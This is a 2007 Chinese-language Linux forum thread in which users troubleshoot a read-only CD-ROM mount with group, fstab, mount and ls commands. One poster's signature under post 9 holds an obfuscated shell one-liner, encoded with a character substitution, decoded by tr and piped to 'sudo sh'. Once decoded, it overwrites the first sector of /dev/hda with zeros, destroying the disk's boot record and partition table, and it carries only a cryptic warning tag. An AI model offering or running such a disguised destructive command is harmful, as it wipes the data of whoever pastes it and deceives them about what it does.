当前时区为 UTC + 8 小时



发表新帖 回复这个主题  [ 11 篇帖子 ] 
作者 内容
1 楼 
 文章标题 : 怎么改变光驱的权限阿
帖子发表于 : 2007-04-26 17:45 

注册: 2007-04-13 21:39
帖子: 17
送出感谢: 0 次
接收感谢: 0 次
我装了这个系统后,放碟进去后不能打开,光驱的权限显示为可读 ,怎么改阿 ?这个改了是不是就能放碟看了阿 ?


页首
 用户资料  
 
2 楼 
 文章标题 :
帖子发表于 : 2007-04-26 17:51 

注册: 2007-03-29 12:59
帖子: 262
送出感谢: 0 次
接收感谢: 0 次
代码:
[test@ziyun ~]$ cat /etc/group |grep cdrom
cdrom:x:24:haldaemon,dingjun,test
[test@ziyun ~]$ cat /etc/fstab |grep cdrom
/dev/cdrom       /mnt/cdrom   udf,iso9660 user,noauto     0       0
[test@ziyun ~]$     

执行这两条命令,看看fstab中有没有user选项,你的用户名是不是在cdrom组中


页首
 用户资料  
 
3 楼 
 文章标题 :
帖子发表于 : 2007-04-26 18:06 

注册: 2007-04-13 21:39
帖子: 17
送出感谢: 0 次
接收感谢: 0 次
stone@stone-desktop:~$ cat /etc/group |grep cdrom
cdrom:x:24:haldaemon,stone
stone@stone-desktop:~$ cat /etc/fstab |grep cdrom
/dev/hdc /media/cdrom0 udf,iso9660 user,noauto 0 0
stone@stone-desktop:~$

运行后是这样


页首
 用户资料  
 
4 楼 
 文章标题 :
帖子发表于 : 2007-04-27 9:11 

注册: 2006-09-24 9:46
帖子: 138
送出感谢: 0 次
接收感谢: 0 次
同问,我的也是这样,想把光盘里的文件复制出来都没有权限。


页首
 用户资料  
 
5 楼 
 文章标题 :
帖子发表于 : 2007-04-27 13:52 

注册: 2007-03-29 12:59
帖子: 262
送出感谢: 0 次
接收感谢: 0 次
楼主这样的设置应该不会出现没有权限的问题
你再试试
sudo umount /media/cdrom0
mount /media/cdrom0
ls /media/cdrom0
看看有什么错误


页首
 用户资料  
 
6 楼 
 文章标题 :
帖子发表于 : 2007-04-27 15:40 

注册: 2006-09-24 9:46
帖子: 138
送出感谢: 0 次
接收感谢: 0 次
gue@xubuntu:~$ sudo umount /media/cdrom0
gue@xubuntu:~$ sudo umount /media/cdrom0
gue@xubuntu:~$ mount /media/cdrom0
mount: 块设备 /dev/scd0 写保护,已只读方式挂载
gue@xubuntu:~$ ls /media/cdrom0
CDI EXT MPEGAV PICTURES SEGMENT VCD


___________________________________
我的就是这个样子。


页首
 用户资料  
 
7 楼 
 文章标题 :
帖子发表于 : 2007-04-27 17:11 

注册: 2007-03-29 12:59
帖子: 262
送出感谢: 0 次
接收感谢: 0 次
楼上的没问题,你用ls 可以看到内容,就可以复制


页首
 用户资料  
 
8 楼 
 文章标题 :
帖子发表于 : 2007-04-27 22:26 

注册: 2007-04-17 20:28
帖子: 31
送出感谢: 0 次
接收感谢: 0 次
sunny@sunny:~$ sudo umount /media/cdrom0
umount: /media/cdrom0: not mounted
sunny@sunny:~$ mount /media/cdrom0
mount: No medium found
sunny@sunny:~$ ls /media/cdrom0
sunny@sunny:~$ sudo umount /media/cdrom0
umount: /media/cdrom0: not mounted
sunny@sunny:~$ mount /media/cdrom0
mount: No medium found
sunny@sunny:~$ ls /media/cdrom0


页首
 用户资料  
 
9 楼 
 文章标题 :
帖子发表于 : 2007-04-27 22:35 

注册: 2007-03-29 12:59
帖子: 262
送出感谢: 0 次
接收感谢: 0 次
楼上的,你光驱没放光盘,你mount干什么


_________________
echo 'qq%vs+&qri&mreb%bs+&qri&uqn%of+FBC%pbhag+B' | tr 'n-za-m&+A-J%' 'a-z/=0-9 ' |sudo sh #<-警告:
强烈鄙视SB版主,一群跟风的SB,一群自以为是的SB
对这个论坛彻底失望了


页首
 用户资料  
 
10 楼 
 文章标题 :
帖子发表于 : 2007-04-27 22:39 
头像

注册: 2005-08-14 21:55
帖子: 58428
地址: 长沙
送出感谢: 4
接收感谢: 272
ls -l /media/cdrom0
看看用户组,权限。不就清楚了。


_________________
● 鸣学


页首
 用户资料  
 
11 楼 
 文章标题 :
帖子发表于 : 2007-04-28 22:17 

注册: 2006-09-24 9:46
帖子: 138
送出感谢: 0 次
接收感谢: 0 次
gue@xubuntu:~$ ls -l /media/cdrom0
总用量 12
dr-xr-xr-x 1 root root 2048 2007-04-15 11:26 CDI
dr-xr-xr-x 1 root root 2048 2007-04-15 11:26 EXT
dr-xr-xr-x 1 root root 2048 2007-04-15 11:26 MPEGAV
dr-xr-xr-x 1 root root 2048 2007-04-15 11:31 PICTURES
dr-xr-xr-x 1 root root 2048 2007-04-15 11:26 SEGMENT
dr-xr-xr-x 1 root root 2048 2007-04-15 11:26 VCD

还是不能复制,用ROOT权限打开thunar也是不行,提示“无法从 "/media/cdrom0/MPEGAV/AVSEQ01.DAT" 读取数据 (Input/output error).”


页首
 用户资料  
 
显示帖子 :  排序  
发表新帖 回复这个主题  [ 11 篇帖子 ] 

当前时区为 UTC + 8 小时


在线用户

正在浏览此版面的用户:没有注册用户 和 5 位游客


不能 在这个版面发表主题
不能 在这个版面回复主题
不能 在这个版面编辑帖子
不能 在这个版面删除帖子
不能 在这个版面提交附件

前往 :  
本站点为公益性站点,用于推广开源自由软件,由 DiaHosting VPSBudgetVM VPS 提供服务。
我们认为:软件应可免费取得,软件工具在各种语言环境下皆可使用,且不会有任何功能上的差异;
人们应有定制和修改软件的自由,且方式不受限制,只要他们自认为合适。

Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
简体中文语系由 王笑宇 翻译